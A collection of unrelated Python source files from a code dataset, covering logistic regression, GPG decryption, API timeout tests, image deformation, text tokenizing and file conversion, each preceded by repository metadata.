df=pd.read_csv("../dataset/dataset_A.csv")
#initialization and data manupulation
# Random initial weights: 11 features + 1 bias column added below.
thetas=np.random.randn(12)
y=df['quality']
del df['quality']
# Bias column of ones prepended as feature 0.
df.insert(0,'fixed',np.ones(y.size))
############### main algorithm ####################
iteration=200
alpha=0.1
m=y.size
one=np.ones(m)
J_theta=np.ones(iteration)
print("Training....")
completed=0
for itr in range(iteration):
    h_theta=np.ones(y.size)
    difference=np.ones(y.size) #difference = h_theta(i) minus y(i)
    # Sigmoid hypothesis for every training example.
    for i in range(m): # m training example
        theta_transpose_x=np.dot(thetas,df.loc[i])
        h_theta[i]=1/(1+np.exp(-1*theta_transpose_x))
    difference=h_theta - y
    # Cross-entropy cost at this iteration.
    # NOTE(review): np.log(h_theta) / np.log(1-h_theta) produce -inf when a
    # prediction saturates at exactly 0 or 1.
    J_theta[itr]=(-1/m)*( np.dot(y,np.log(h_theta)) + np.dot((1-y),np.log(1-h_theta)) )
    # Gradient step per weight; `difference` is fixed before this loop, so
    # the update is a proper simultaneous batch update.
    for j in range(thetas.size): #training
        summation = np.dot(difference,one*df.iloc[:,j])
        thetas[j]=thetas[j]-(alpha/m)*summation
############## plotting ###############
plt.figure()
plt.plot(range(iteration),J_theta)
plt.xlabel('iteration')
plt.ylabel('Cost')
plt.title('Cost v/s iteration')
plt.show()
############## Accuracy ###################
# Training accuracy at the 0.5 decision threshold.
acc=0
for i in range(m):
    h=1/(1+np.exp(-1*np.dot(thetas,df.loc[i])))
    if(h > 0.5 and y[i]==1):
        acc=acc+1
    elif(h <= 0.5 and y[i]==0):
        acc=acc+1
acc=(acc/m)*100
print()
print(acc,'percent data on training-data are correctly classified')
| true |
44acf1540ff3b01a76d3c45654ab0e01b0cd0221 | Python | rossor/data-import | /src/gpg.py | UTF-8 | 673 | 2.5625 | 3 | [] | no_license | # -*- coding: utf-8 -*-
from subprocess import call
import logging
import os.path
def decrypt(gpgbin, source, destination):
    """Decrypt `source` into `destination` with GPG.

    The passphrase is read from ~/.passphrase and fed to gpg on fd 0.
    Returns an error string when the passphrase file is missing, or None
    otherwise; raises IOError when the gpg binary itself is missing.
    """
    if not os.path.isfile(gpgbin):
        logging.critical("{} not found".format(gpgbin))
        raise IOError("{} not found".format(gpgbin))
    ppfile = os.path.join(os.path.expanduser("~"), ".passphrase")
    if not os.path.isfile(ppfile):
        return 'GPG passphrase file "{}" not found'.format(ppfile)
    # Build an argument list instead of a shell string: file names containing
    # spaces or shell metacharacters are no longer mis-parsed (or worse,
    # executed).  The old `< ppfile` / `2>/dev/null` shell redirections become
    # explicit stdin/stderr handles.
    cmd = [gpgbin, "-dq", "--batch", "--passphrase-fd", "0",
           "--output", destination, source]
    logging.debug("Executing decrypt command: {}".format(" ".join(cmd)))
    with open(ppfile, "rb") as passphrase, open(os.devnull, "wb") as devnull:
        call(cmd, stdin=passphrase, stderr=devnull)
    return None
| true |
4f5b582eda0d414d5bdc5ae85c0fcbeff0b4612a | Python | googleapis/python-api-core | /tests/unit/test_timeout.py | UTF-8 | 7,046 | 2.5625 | 3 | [
"Apache-2.0"
] | permissive | # Copyright 2017 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import datetime
import itertools
import mock
from google.api_core import timeout as timeouts
def test__exponential_timeout_generator_base_2():
    """Without a deadline the timeouts double until capped at the maximum."""
    generator = timeouts._exponential_timeout_generator(1.0, 60.0, 2.0, deadline=None)
    first_eight = list(itertools.islice(generator, 8))
    assert first_eight == [1, 2, 4, 8, 16, 32, 60, 60]
@mock.patch("google.api_core.datetime_helpers.utcnow", autospec=True)
def test__exponential_timeout_generator_base_deadline(utcnow):
    """With a deadline, timeouts stop growing and shrink as it approaches."""
    # Fake clock: every utcnow() call advances by exactly one second.
    utcnow.side_effect = [
        datetime.datetime.min + datetime.timedelta(seconds=n) for n in range(15)
    ]
    generator = timeouts._exponential_timeout_generator(1.0, 60.0, 2.0, deadline=30.0)
    values = list(itertools.islice(generator, 14))
    # Grows until the cumulative time exceeds 30s, then decreases as the
    # cumulative time approaches 60s.
    assert values == [1, 2, 4, 8, 16, 24, 23, 22, 21, 20, 19, 18, 17, 16]
class TestTimeToDeadlineTimeout(object):
    """Tests for TimeToDeadlineTimeout: the applied timeout is the time
    remaining until the deadline established by the first call."""
    def test_constructor(self):
        timeout_ = timeouts.TimeToDeadlineTimeout()
        assert timeout_._timeout is None
    def test_constructor_args(self):
        timeout_ = timeouts.TimeToDeadlineTimeout(42.0)
        assert timeout_._timeout == 42.0
    def test___str__(self):
        timeout_ = timeouts.TimeToDeadlineTimeout(1)
        assert str(timeout_) == "<TimeToDeadlineTimeout timeout=1.0>"
    def test_apply(self):
        target = mock.Mock(spec=["__call__", "__name__"], __name__="target")
        # NOTE(review): the next two calls discard their results -- dead code.
        datetime.datetime.utcnow()
        datetime.timedelta(seconds=1)
        now = datetime.datetime.utcnow()
        # Fake clock instants, consumed one per clock call via pop(0) below.
        times = [
            now,
            now + datetime.timedelta(seconds=0.0009),
            now + datetime.timedelta(seconds=1),
            now + datetime.timedelta(seconds=39),
            now + datetime.timedelta(seconds=42),
            now + datetime.timedelta(seconds=43),
        ]
        def _clock():
            return times.pop(0)
        timeout_ = timeouts.TimeToDeadlineTimeout(42.0, _clock)
        wrapped = timeout_(target)
        # Expected remaining budget at each successive fake instant; note it
        # bottoms out at 0.0 rather than going negative past the deadline.
        wrapped()
        target.assert_called_with(timeout=42.0)
        wrapped()
        target.assert_called_with(timeout=41.0)
        wrapped()
        target.assert_called_with(timeout=3.0)
        wrapped()
        target.assert_called_with(timeout=0.0)
        wrapped()
        target.assert_called_with(timeout=0.0)
    def test_apply_no_timeout(self):
        target = mock.Mock(spec=["__call__", "__name__"], __name__="target")
        # NOTE(review): dead code, as in test_apply.
        datetime.datetime.utcnow()
        datetime.timedelta(seconds=1)
        now = datetime.datetime.utcnow()
        times = [
            now,
            now + datetime.timedelta(seconds=0.0009),
            now + datetime.timedelta(seconds=1),
            now + datetime.timedelta(seconds=2),
        ]
        def _clock():
            return times.pop(0)
        # No timeout configured: the wrapped call receives no timeout kwarg.
        timeout_ = timeouts.TimeToDeadlineTimeout(clock=_clock)
        wrapped = timeout_(target)
        wrapped()
        target.assert_called_with()
        wrapped()
        target.assert_called_with()
    def test_apply_passthrough(self):
        target = mock.Mock(spec=["__call__", "__name__"], __name__="target")
        timeout_ = timeouts.TimeToDeadlineTimeout(42.0)
        wrapped = timeout_(target)
        # Positional and keyword arguments pass through untouched.
        wrapped(1, 2, meep="moop")
        target.assert_called_once_with(1, 2, meep="moop", timeout=42.0)
class TestConstantTimeout(object):
    """Unit tests for timeouts.ConstantTimeout."""

    def test_constructor(self):
        default = timeouts.ConstantTimeout()
        assert default._timeout is None

    def test_constructor_args(self):
        configured = timeouts.ConstantTimeout(42.0)
        assert configured._timeout == 42.0

    def test___str__(self):
        assert str(timeouts.ConstantTimeout(1)) == "<ConstantTimeout timeout=1.0>"

    def test_apply(self):
        stub = mock.Mock(spec=["__call__", "__name__"], __name__="target")
        decorated = timeouts.ConstantTimeout(42.0)(stub)
        decorated()
        stub.assert_called_once_with(timeout=42.0)

    def test_apply_passthrough(self):
        stub = mock.Mock(spec=["__call__", "__name__"], __name__="target")
        decorated = timeouts.ConstantTimeout(42.0)(stub)
        # Positional and keyword arguments pass through untouched.
        decorated(1, 2, meep="moop")
        stub.assert_called_once_with(1, 2, meep="moop", timeout=42.0)
class TestExponentialTimeout(object):
    """Unit tests for timeouts.ExponentialTimeout."""

    def test_constructor(self):
        defaults = timeouts.ExponentialTimeout()
        assert defaults._initial == timeouts._DEFAULT_INITIAL_TIMEOUT
        assert defaults._maximum == timeouts._DEFAULT_MAXIMUM_TIMEOUT
        assert defaults._multiplier == timeouts._DEFAULT_TIMEOUT_MULTIPLIER
        assert defaults._deadline == timeouts._DEFAULT_DEADLINE

    def test_constructor_args(self):
        configured = timeouts.ExponentialTimeout(1, 2, 3, 4)
        assert configured._initial == 1
        assert configured._maximum == 2
        assert configured._multiplier == 3
        assert configured._deadline == 4

    def test_with_timeout(self):
        base = timeouts.ExponentialTimeout()
        derived = base.with_deadline(42)
        # with_deadline returns a *new* instance; only the deadline differs.
        assert base is not derived
        assert derived._initial == timeouts._DEFAULT_INITIAL_TIMEOUT
        assert derived._maximum == timeouts._DEFAULT_MAXIMUM_TIMEOUT
        assert derived._multiplier == timeouts._DEFAULT_TIMEOUT_MULTIPLIER
        assert derived._deadline == 42

    def test___str__(self):
        configured = timeouts.ExponentialTimeout(1, 2, 3, 4)
        assert str(configured) == (
            "<ExponentialTimeout initial=1.0, maximum=2.0, multiplier=3.0, "
            "deadline=4.0>"
        )

    def test_apply(self):
        stub = mock.Mock(spec=["__call__", "__name__"], __name__="target")
        decorated = timeouts.ExponentialTimeout(1, 10, 2)(stub)
        # Each call doubles the applied timeout: 1, 2, 4, ...
        for expected in (1, 2, 4):
            decorated()
            stub.assert_called_with(timeout=expected)

    def test_apply_passthrough(self):
        stub = mock.Mock(spec=["__call__", "__name__"], __name__="target")
        decorated = timeouts.ExponentialTimeout(42.0, 100, 2)(stub)
        # Positional and keyword arguments pass through untouched.
        decorated(1, 2, meep="moop")
        stub.assert_called_once_with(1, 2, meep="moop", timeout=42.0)
| true |
7d82076b3ab664ea5c8d8f64c74df9b68c48cca9 | Python | ComradeMudkipz/lwp3 | /Chapter 2/compoundInterestCalculator.py | UTF-8 | 176 | 3.546875 | 4 | [] | no_license | # compoundInterestCalculator.py
# A compound interest calculator.
# Principal, compounding periods per year, and annual rate.
# NOTE(review): r = 0.8 means 80% per year -- unusually high; confirm intent.
P = int(10000)
n = int(12)
r = float(0.8)
t = int(input("How many years? "))
# Compound interest: A = P * (1 + r/n) ** (n*t).
# Bug fix: the original raised to the power n and then *multiplied* by t,
# which is not compounding over t years.
print(P * (1 + r / n) ** (n * t))
| true |
861ceeec149805b6026005543f4be5f2868720f6 | Python | gabriellaec/desoft-analise-exercicios | /backup/user_209/ch8_2020_08_14_13_04_52_381177.py | UTF-8 | 59 | 2.53125 | 3 | [] | no_license | def calcula_posicao (so,v,t):
p = so + v*t
return p | true |
528cc3932d89e6d8473da72e1bbaf5af25dc531b | Python | beelzebielsk/image-deformation | /draw.py | UTF-8 | 5,904 | 2.828125 | 3 | [
"MIT"
] | permissive | import tkinter
from tkinter import ttk
from PIL import ImageTk, Image
import numpy as np
import os
from deformation import deform
# Listener callbacks
def listenClick(event):
    """Left-click: grab an existing green handle, or create a new point pair."""
    global w, current, new, deformButton
    print('Clicking', event.x, event.y)
    # If the click landed inside an existing (green) handle's bounding box,
    # grab it for dragging and stop.
    for pt in new:
        point = w.coords(pt)
        if (event.x >= point[0] and event.x <= point[2]) and (event.y >= point[1] and event.y <= point[3]):
            print('Exists', w.type(pt))
            current = pt
            return
    # Otherwise create a new control-point pair at the click location and
    # enable the Deform button once at least one point exists.
    print('Creating point')
    createPoint(event)
    if len(new) >0:
        deformButton.config(state='normal', text='Deform')
def listenDrag(event):
    """Mouse drag: move the held handle and re-aim its arrow."""
    global w, current, new, original, arrows
    print('Dragging', event.x, event.y)
    print(current != None)
    if current != None:
        print('Dragging it!', event.x, event.y)
        movePoint(event)
        # Redraw the arrow belonging to the dragged handle: keep its tail,
        # point its head at the handle's new center.
        for pt in range(len(new)):
            if current == new[pt]:
                new_coords = getActualCoords(new[pt])
                # NOTE(review): orig_coords is unused; the arrow tail is taken
                # from the arrow's existing coordinates instead.
                orig_coords = getActualCoords(original[pt])
                old_coords = w.coords(arrows[pt])
                w.coords(arrows[pt], old_coords[0], old_coords[1], new_coords[0], new_coords[1])
def listenRelease(event):
    """Mouse-button release: drop whatever handle was being dragged.

    Deformation is applied on demand via the Deform button rather than on
    every release.
    """
    global current, img2
    print('Releasing', event.x, event.y)
    current = None
def listenHover(event):
    """Plain mouse motion: refresh the coordinate readout."""
    updateMouseCoord(event)
def deformPicture():
    """Run the deformation from the origin points to the dragged points and
    display the result on the right-hand canvas image."""
    global rimg1, img2, img2_canvas
    p, q = getPoints()
    print("List of points p:", p)
    print("List of points q:", q)
    image = getPicture(rimg1)
    # NOTE(review): real_p/real_q are computed but never used -- deform()
    # below receives the float tuples p and q.  Also np.int was removed in
    # NumPy 1.24; these two lines would need astype(int) if ever revived.
    real_p = np.array(p).astype(np.int)
    real_q = np.array(q).astype(np.int)
    deformed = deform(image, p, q)
    # Keep a module-level reference to the PhotoImage so Tk doesn't garbage
    # collect it while it is displayed.
    img2 = ImageTk.PhotoImage(arrayToPicture(deformed))
    w.itemconfigure(img2_canvas, image=img2)
# Create points
def createPoint(event):
    """Add a red origin marker, a green draggable marker and an arrow at the
    click position (ignored when the click is outside the image)."""
    global w, width, height, new, coord
    if event.x < 0 or event.x > width or event.y < 0 or event.y > height:
        w.itemconfigure(coord, text=w.itemcget(coord, 'text')+' Out of bounds')
        return
    x = event.x
    y = event.y
    # 9-px-radius handles; red = fixed original position, green = draggable target.
    original.append(w.create_oval(x-9, y-9, x+9, y+9, width=0, fill="#ff0000",activefill="#ff0000",disabledfill="#ff0000"))
    new.append(w.create_oval(x-9, y-9, x+9, y+9, width=0, fill="#00ff00"))
    # Degenerate (zero-length) arrow; listenDrag stretches it as the green
    # handle moves.
    arrow = w.create_line(x, y, x, y, width=2, arrow=tkinter.LAST)
    arrows.append(arrow)
# Move point
def movePoint(event):
    """Drag the currently-held handle, clamping it to the image bounds, and
    update the coordinate readout (flagging out-of-bounds pointers)."""
    global width, height
    # Clamp the pointer position to [0, width] x [0, height].
    x = 0 if event.x < 0 else (width if event.x > width else event.x)
    y = 0 if event.y < 0 else (height if event.y > height else event.y)
    clamped = x != event.x or y != event.y
    error_msg = ' Out of bounds' if clamped else ''
    w.coords(current, x-9, y-9, x+9, y+9)
    w.itemconfigure(coord, text='%d, %d'%(event.x, event.y) + error_msg)
# Get points
def getPoints():
    """Return ([origin centers], [target centers]) as lists of (x, y) tuples."""
    origins = [getActualCoords(item) for item in original]
    targets = [getActualCoords(item) for item in new]
    return origins, targets
# Get picture
def getPicture(pic):
    """View the PIL image (or any array-like) as a NumPy array without copying."""
    return np.asarray(pic)
def arrayToPicture(arr):
    """Convert a numeric array back into an 8-bit PIL image."""
    as_bytes = np.uint8(arr)
    return Image.fromarray(as_bytes)
def getActualCoords(point):
    """Center (x, y) of a 9-px-radius canvas oval, from its bounding box."""
    x0, y0 = w.coords(point)[:2]
    return x0 + 9, y0 + 9
def updateMouseCoord(event):
    # Refresh the on-canvas coordinate read-out with the current cursor position.
    global w, coord
    w.itemconfigure(coord, text='%d, %d'%(event.x, event.y))
def main():
    """Build the two-pane Tk UI (source picture left, deformed picture right),
    wire up the mouse handlers, and enter the event loop."""
    global w, width, height, new, original, arrows, coord, rimg1, img2, img2_canvas, deformButton
    # BUG FIX: `current` must be declared global here, otherwise the
    # `current = None` below only creates a local that shadows the module-level
    # drag state read/written by the event handlers.
    global current
    # Initialize window and canvas
    top = tkinter.Tk()
    w = tkinter.Canvas(top)
    w.grid(row=0, column=0)
    # Event Listeners
    w.bind('<Button-1>', listenClick)
    w.bind('<B1-Motion>', listenDrag)
    w.bind('<ButtonRelease-1>', listenRelease)
    w.bind('<Motion>', listenHover)
    # Open the source image; the window holds two copies of it side by side.
    rimg1 = Image.open("./dorabenny.jpg")
    [width, height] = rimg1.size
    w.config(width=width*2, height=height)
    # img1 must stay referenced for the lifetime of mainloop() below.
    img1 = ImageTk.PhotoImage(rimg1)
    # Left pane: the original picture; a vertical line separates the panes.
    w.create_image(0, 0, image=img1, anchor="nw")
    w.create_line(width, 0, width, height)
    # Right pane: placeholder image item, filled in later by deformPicture().
    img2 = None
    img2_canvas = w.create_image(width, 0, image=img2, anchor="nw")
    f = tkinter.Frame(height=50)
    deformButton = tkinter.Button(f, text="Need to add points", state='disabled', command=deformPicture)
    # Drag state and control-point bookkeeping shared with the handlers.
    current = None
    new = []
    original = []
    arrows = []
    # Coordinate indicator in the bottom-left corner of the canvas.
    coord = w.create_text(10, height)
    w.itemconfigure(coord, text='0 0', anchor="sw")
    top.geometry('{}x{}'.format(2*width, height+50))
    deformButton.grid(row=0, column=0)
    w.grid(row=1)
    f.grid(row=0)
    top.mainloop()
# Script entry point: launch the interactive deformation UI.
if __name__ == '__main__':
    main()
| true |
a0774cf3007ab7bb3a7cea02e9dd6dd828266ae0 | Python | Hakkim-s/Learn_Data_Science | /Data Visualisation/Sample Excersice/Abul's Assignment.py | UTF-8 | 2,086 | 2.75 | 3 | [] | no_license | #!/usr/bin/env python
# coding: utf-8
# In[8]:
from statistics import mode
mode([5, 17, 23, 31, 43, 49, 57, 17, 57, 17])
# In[11]:
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
# In[12]:
train_data=pd.read_csv("Standard Metropolitan Areas Data - train_data - data.csv")
# In[62]:
train_data1=pd.read_csv("Standard Metropolitan Areas Data - train_data - data.csv")
# In[63]:
train_data1
# In[64]:
train_data= train_data1
# In[65]:
train_data
# In[ ]:
# In[35]:
# Count rows in region 4. The original
#     if train_data.region == 4: count += 1
# raises "ValueError: The truth value of a Series is ambiguous" at runtime;
# summing the boolean mask is the vectorized pandas equivalent of the
# (presumed) intended count — TODO confirm against the notebook author.
count = int((train_data.region == 4).sum())
# In[61]:
train_data
# In[ ]:
# In[13]:
train_data.describe()
# In[34]:
mode(train_data.region)
# In[ ]:
# In[ ]:
# In[14]:
train_data.info()
# In[16]:
train_data.head()
# In[17]:
train_data.tail()
# In[22]:
train_data['hospital_beds'].isnull().sum()
# In[30]:
plt.scatter(train_data.crime_rate,train_data.region)
# In[32]:
x=train_data
plt.plot(x.land_area, x.crime_rate)
plt.show()
# In[68]:
# NOTE(review): `train_data['region']` is not a boolean mask here, so `&`
# performs a bitwise AND against raw region codes — probably meant something
# like (train_data['region'] == R) & (train_data['land_area'] >= 5000).
train_data[(train_data['region'] ) & (train_data['land_area'] >= 5000)]
# In[ ]:
# FIXME: the following cell was exported garbled and is a SyntaxError that made
# the whole file unparseable; commented out to keep the module importable.
# It looks like the start of a `train_data['crime_rate'] > ...` filter.
# train_data['crime_rate'] >)
# In[ ]:
# In[73]:
train_data[(train_data['region'] >3)]
# In[79]:
qq=train_data[(train_data['region'] <=1)]
# In[80]:
qq
# In[81]:
qq[qq['crime_rate']>=54.16]
# In[84]:
plt.scatter(train_data.physicians,train_data.hospital_beds)
plt.title('Plot of hospital_beds,physicians') # Adding a title to the plot
plt.ylabel("hospital_beds") # Adding the label for the horizontal axis
plt.xlabel("physicians") # Adding the label for the vertical axis
plt.show()
# In[87]:
train_data['region'].value_counts().plot(kind='bar');
# In[89]:
plt.hist(train_data.income)
plt.show()
# In[91]:
train_data.corr()
# In[ ]:
# In[ ]:
# In[ ]:
# In[ ]:
# In[ ]:
# In[ ]:
# In[ ]:
# In[ ]:
# In[ ]:
# In[ ]:
# In[ ]:
# In[ ]:
# In[ ]:
# In[ ]:
# In[ ]:
# In[ ]:
# In[ ]:
# In[ ]:
# In[ ]:
# In[ ]:
# In[ ]:
# In[ ]:
| true |
75fab5b118d37353f3c76a342d5bfa09bf3693a8 | Python | DeepHiveMind/Demo_Noflo_Data | /GraphPlot.py | UTF-8 | 247 | 2.859375 | 3 | [] | no_license | import matplotlib.pyplot as plt
import pandas as pd
import sys
import io
# The whole CSV document is passed verbatim as the first command-line argument.
data_string = sys.argv[1]
data = io.StringIO(data_string)
df = pd.read_csv(data, sep=",")
# Red bar chart of 'unit price' against 'quantity'
# (plt is matplotlib.pyplot, imported at the top of this file).
df.plot(kind='bar',x='quantity',y='unit price',color='red')
plt.show()
| true |
295b2cb3bc6311a369c2e1e5c8818fc9e67895a0 | Python | christophmeyer/longboard-pothole-detection | /pothole_model/preprocessing/preprocess_data.py | UTF-8 | 3,712 | 2.78125 | 3 | [
"MIT"
] | permissive | import argparse
import pandas as pd
import numpy as np
import os
from shutil import copyfile
from preprocessing.convert_images import read_grayscale
from sklearn.model_selection import train_test_split
from model.train import ModelConfig
def read_annotated_capture_data(input_dir):
    """
    Loops over all capture directories in the input_dir and puts them together. Assumes there
    to be a labels.csv. Only uses the images that are in the labels.csv, ignores the others. Thus,
    in order to remove images from the dataset, just delete the corresponding row in labels.csv.

    args:
        input_dir (string): directory whose sub-directories are individual
            captures, each with a semicolon-separated labels.csv containing
            'file' and 'label' columns.
    returns:
        (picture_filenames, labels): file paths relative to input_dir and a
        float ndarray of the matching labels, in the same order.
    """
    picture_filenames = []
    labels_list = []
    for capture_dir in os.listdir(input_dir):
        # Skip stray files (e.g. .DS_Store): only real capture directories can
        # contain a labels.csv; the original crashed on such entries.
        if not os.path.isdir(os.path.join(input_dir, capture_dir)):
            continue
        annotated_labels = pd.read_csv(
            os.path.join(input_dir, capture_dir, 'labels.csv'), sep=';')
        picture_filenames.extend(
            os.path.join(capture_dir, filename)
            for filename in annotated_labels['file'])
        # Vectorized copy replaces the original element-by-element loop
        # (which also shadowed the builtin `id`).
        labels_list.append(annotated_labels['label'].to_numpy(dtype=float))
    labels = np.concatenate(labels_list)
    return picture_filenames, labels
def save_data(input_dir, picture_filenames, labels, prefix, output_dir, augment=False):
    """
    Saves the data for a given split (train/val/test) to the subdirectory prefix of the output_dir.
    If augment=True, then also vertically flipped images are saved together with the corresponding
    labels.
    """
    split_dir = os.path.join(output_dir, prefix)
    print('Saving {} data to {}'.format(prefix, split_dir))
    out_subdir = os.path.join(split_dir, 'features')
    if not os.path.exists(out_subdir):
        os.makedirs(out_subdir)
    # Flipped copies reuse the original labels, so the label vector is doubled.
    if augment:
        labels = np.concatenate([labels, labels])
    np.savetxt(os.path.join(split_dir, 'labels.csv'), labels, delimiter=';')

    def _out_path(i):
        # Feature files are numbered sequentially: <prefix>_000000.gs, ...
        return os.path.join(out_subdir, '{}_{}.gs'.format(prefix, str(i).zfill(6)))

    # Pass 1: verbatim copies of the raw grayscale files.
    for index, filename in enumerate(picture_filenames):
        copyfile(os.path.join(input_dir, filename), _out_path(index))
    # Pass 2 (augmentation): vertically flipped versions, numbered after the originals.
    if augment:
        offset = len(picture_filenames)
        for index, filename in enumerate(picture_filenames, start=offset):
            gs_img = read_grayscale(os.path.join(input_dir, filename), width=96)
            np.flip(gs_img, (1)).tofile(_out_path(index))
def preprocess_data(config):
    """
    Combines the data from all capture directories in the raw_data_dir, splits the data into
    train, validation and test and augments the data by vertically flipping images. The resulting
    data is saved into train, val, test subdirs of the train_data_dir.
    """
    filenames, labels = read_annotated_capture_data(config.raw_data_dir)
    # First carve off the test split, then split the remainder into train/val
    # (fixed seeds keep the splits reproducible across runs).
    trainval_files, test_files, trainval_labels, test_labels = train_test_split(
        filenames, labels, test_size=config.test_split, random_state=1)
    train_files, val_files, train_labels, val_labels = train_test_split(
        trainval_files, trainval_labels, test_size=config.validation_split, random_state=1)
    for split_files, split_labels, prefix, augment in (
            (train_files, train_labels, 'train', config.augment_train_data),
            (val_files, val_labels, 'val', config.augment_val_data),
            (test_files, test_labels, 'test', config.augment_test_data)):
        save_data(config.raw_data_dir, split_files, split_labels, prefix,
                  config.train_data_dir, augment)
# Command-line entry point: --config_path selects the ModelConfig to preprocess.
if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('--config_path')
    args = parser.parse_args()
    config = ModelConfig(config_path=args.config_path)
    preprocess_data(config)
| true |
f287d1e1ac0cbc3a2d7367bc514c01cd18815c5b | Python | david30907d/soph | /demos/utils.py | UTF-8 | 2,785 | 3.125 | 3 | [
"MIT"
] | permissive | # coding: utf-8
import re
import jieba
import logging
from functools import partial
jieba.setLogLevel(logging.INFO)
PUNCTS_PATTERN = re.compile(ur"[.,;:!?'\"~\[\]\(\)\{\}_—。….,;、:!?‘’“”〕《》【】〖〗()「」~]")
SPACES_PATTERN = re.compile(ur"[\r\n\t\u00a0 ]")
SENT_SEP = u'。,!?~;:.,!?:;'
def encode_from_unicode(text):
    """Encode unicode text to a UTF-8 byte string (Python 2 ``str``); other values pass through."""
    if isinstance(text, unicode):
        return text.encode('utf-8')
    return text
def decode_to_unicode(text):
    """Decode a UTF-8 byte string to ``unicode``; other values pass through."""
    if isinstance(text, str):
        return text.decode('utf-8')
    return text
def to_halfwidth(text):
    """Convert full-width characters in *text* to their half-width equivalents.

    (Python 2 code: operates on ``unicode``; byte strings are decoded first.)
    """
    text = decode_to_unicode(text)
    res = u''
    for uchar in text:
        inside_code = ord(uchar)
        if inside_code == 0x3000:
            # Ideographic space maps directly to the ASCII space.
            inside_code = 0x0020
        else:
            # Other full-width forms sit at a fixed 0xfee0 offset above ASCII.
            inside_code -= 0xfee0
        if inside_code < 0x0020 or inside_code > 0x7e:
            # Not a full-width form after shifting: keep the original character.
            res += uchar
        else:
            res += unichr(inside_code)
    return res
def remove_punctuations(text):
    """Replace every CJK/ASCII punctuation mark in *text* with a single space."""
    return PUNCTS_PATTERN.sub(u' ', decode_to_unicode(text))
def unify_whitespace(text):
    """Normalize all whitespace characters (tabs, newlines, NBSP, ...) to plain spaces."""
    return SPACES_PATTERN.sub(u' ', decode_to_unicode(text))
def remove_redundant(text, chars):
    """Collapse each run of consecutive characters from *chars* down to one occurrence."""
    text = decode_to_unicode(text)
    chars = decode_to_unicode(chars)
    if chars == u'' or text == u'':
        return text
    collapsible = set(chars)
    pieces = []
    prev = u''
    for ch in text:
        # Keep the char unless it repeats the previous one AND is collapsible.
        if ch != prev or ch not in collapsible:
            pieces.append(ch)
        prev = ch
    return u''.join(pieces)
def clean(text):
    """Normalize text: half-width, strip punctuation, unify whitespace, squeeze spaces."""
    result = text
    for transform in (to_halfwidth,
                      remove_punctuations,
                      unify_whitespace,
                      partial(remove_redundant, chars=u' ')):
        result = transform(result)
    return result
def words_tokenize(text):
    """Segment *text* into words with jieba, dropping whitespace-only tokens."""
    stripped = (word.strip() for word in jieba.cut(decode_to_unicode(text)))
    return [token for token in stripped if token]
def sents_tokenize(text, puncts=SENT_SEP):
    """Split *text* into sentences, each returned as a list of word tokens.

    A new sentence starts at the first non-punctuation token that follows a
    sentence-ending punctuation mark from *puncts*.
    """
    tokens = words_tokenize(text)
    sents = []
    prev = u' '
    cur_sent = []
    for tk in tokens:
        if tk not in puncts and prev in puncts:
            # The previous token closed a sentence: flush it and start fresh.
            sents.append(cur_sent)
            cur_sent = []
        cur_sent.append(tk)
        prev = tk
    if cur_sent:
        sents.append(cur_sent)
    return sents
def shingle(sequence, length):
    """Return all contiguous subsequences of *sequence* with exactly *length* items."""
    total = len(sequence)
    if total < length:
        return []
    return [sequence[start:start + length] for start in xrange(total - length + 1)]
| true |
a944e0c837c86fa14101c4f98c07ad01b3905efd | Python | lucas-alcantara/perl_vs_python | /read_and_write.py | UTF-8 | 1,184 | 3.8125 | 4 | [] | no_license | # Read and Write Files Row by Row in Python
# Import os module for system function
import os

# Input file name
iris_in = "iris.csv"
# Output file name
iris_out = "iris.tsv"
# URL
url = "http://archive.ics.uci.edu/ml/machine-learning-databases/iris/iris.data"
# Download and save iris dataset
# -s Silent mode. Don't output anything
# -o Write output to <file> instead of stdout
# NOTE(review): shells out to curl; urllib.request.urlretrieve would avoid the
# external tool dependency, kept as-is to preserve behavior.
os.system("curl %s -s -o %s" % (url, iris_in))

# Open both files in one `with` statement so they are closed automatically.
# The original code also called fin.close()/fout.close() *after* the with
# blocks, which was redundant (the context managers had already closed them).
with open(iris_in, 'r') as fin, open(iris_out, 'w') as fout:
    # read file one line at a time
    for line in fin:
        # convert the comma-separated row into a tab-separated row
        fields = line.rstrip().split(',')
        fout.write('\t'.join(fields) + "\n")
| true |
a19e78dd0821f6b1e0f4fa5a53cfc5d7f6533bc3 | Python | dougjaso/amazon-connect-snippets | /python/remote-control-center/GetConfigLambda/lambda_function.py | UTF-8 | 6,055 | 2.6875 | 3 | [
"MIT-0"
] | permissive | import boto3
import os
import time
from boto3.dynamodb.conditions import Key, Attr
'''
SAMPLE CONNECT INVOCATION EVENTS
Get a single Message with language code in attributes:
{
"Name": "ContactFlowEvent",
"Details": {
"ContactData": {
"Attributes": {
"LanguageCode": "es"
}
},
"Parameters": {
"CollectionId": "ENTRY_FLOW",
"ConfigId": "MENU_OPTIONS"
}
}
}
returns:
{
"SUCCESS": "TRUE",
"MENU_OPTIONS": "Presione 1 para hablar con un agente. Pulse 2 para escuchar nuestras últimas noticias."
}
Get a single Message with language code in attributes but OVERWRITTEN by parameters:
{
"Name": "ContactFlowEvent",
"Details": {
"ContactData": {
"Attributes": {
"LanguageCode": "es"
}
},
"Parameters": {
"CollectionId": "ENTRY_FLOW",
"ConfigId": "MENU_OPTIONS"
}
}
}
returns:
{
"SUCCESS": "TRUE",
"MENU_OPTIONS": "Appuyez sur 1 pour parler à un agent. Appuyez sur 2 pour connaître nos dernières nouvelles."
}
Get all messagees from a collection:
{
"Name": "ContactFlowEvent",
"Details": {
"ContactData": {
"Attributes": {
"LanguageCode": "en"
}
},
"Parameters": {
"CollectionId": "ENTRY_FLOW"
}
}
}
returns:
{
"SUCCESS": "TRUE",
"EMERGENCY_MESSAGE": "We are currently closed due to company holiday.",
"GREETING": "Hello. Thank you for calling the Amazon Connect Command Center hotline",
"HOT_MESSAGE": "We're experiencing higher than normal hold times.",
"HOT_MESSAGE_FLAG": "2",
"LATEST_NEWS": "We are excited to launch the Amazon Connect Command Center solution",
"MENU_OPTIONS": "Press 1 to speak to an agent. Press 2 to hear our latest news.",
